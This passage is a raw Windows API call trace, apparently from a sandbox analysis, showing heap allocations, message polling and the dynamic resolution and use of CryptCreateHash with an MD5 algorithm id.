(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0224.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0224.321] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0224.321] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0224.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0224.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0224.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0224.322] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0224.322] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0224.322] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0224.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0224.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0224.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e513d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0224.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0224.323] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0224.323] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0224.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0224.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0224.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0224.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0224.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0224.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0224.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0224.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0224.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0224.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0224.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0224.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0224.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0224.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0224.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0224.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0224.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0224.329] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0224.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0224.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0224.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0224.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0224.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0224.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 